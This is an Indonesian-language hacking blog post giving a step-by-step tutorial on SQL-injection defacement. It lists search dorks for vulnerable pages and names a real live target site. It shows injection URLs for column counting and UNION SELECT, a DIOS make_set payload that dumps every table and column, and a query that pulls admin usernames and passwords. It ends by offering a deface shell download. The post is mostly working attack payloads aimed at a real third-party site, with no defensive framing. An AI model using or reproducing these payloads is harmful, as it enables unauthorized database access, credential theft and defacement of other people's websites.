Deface sql manual with dios

Aditya Prtma December 15, 2019
asalamualaikum teman teman blik lgi di blog gua,x ini gua ngasih tutor deface poc sql manual,ok langsung ke tutor na

~Dork:
department.asp?dept=

itemdetails.cfm?catalogId=

itemdetails.asp?catalogId=

product_detail.asp?catalogid=

product_detail.cfm?catalogid=

product_list.asp?catalogid=

product_list.cfm?catalogid=

ShowProduct.cfm?CatID=

ShowProduct.asp?CatID=

live target: http://iagcc.com/news.php?id=58

ok kita cek dulu web na vuln aoa ngga nah cara cek na tinggl kasih tanda ' atau lu tambahin %27 nih kek gua

http://iagcc.com/news.php?id=58'

nah vuln mek Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY id DESC' at line 1

 ok kyta injek sekrng caranya tambahin order order nya

 http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4--(Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)

 karena eror nya di angka 7 jadi colomn nya ada 6

 sekrng kita kasih union select  sesuai column nya

 contoh:

 http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--

jangan lupa pake tanda (-)nya njeng

Setelah itu akan muncul angka ajaibnya. Pada web tadi angka ajaibnya ada pada angka 4. Karena angka ajaib ada di angka 4, maka kita akan masukkan diosnya.

Dios:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

gapaham?banyakin lgi coli nya

contoh ni:
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--

tuh muncul table admin user sama pasword na,lihat ss mek

nah dit gimana cara liat u/p admin na?nih seperti ini

http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--

dan bomm u sama p admin na dapet u know lah

ok dah sekian tutor dari ane cpek ketik mek hadeh
titip nick:MR SPONGEBOB
Gapunya shel/scrip deface?Klik aku kak buat donlot nya

Btw kalau gapaham silhkn komen

Follow instagram gua:Click me senpai
Subscreb chanel gua:Click me
Thansk to:
SPONGEBOB CYBER TEAM


Reactions
Aditya Prtma

Posted by Aditya Prtma

"Sekedar Anak Pemalas, Yang Memiliki Ketertarikan Dengan Dunia Hacking, Security & Teknologi"

Post a Comment

0 Comments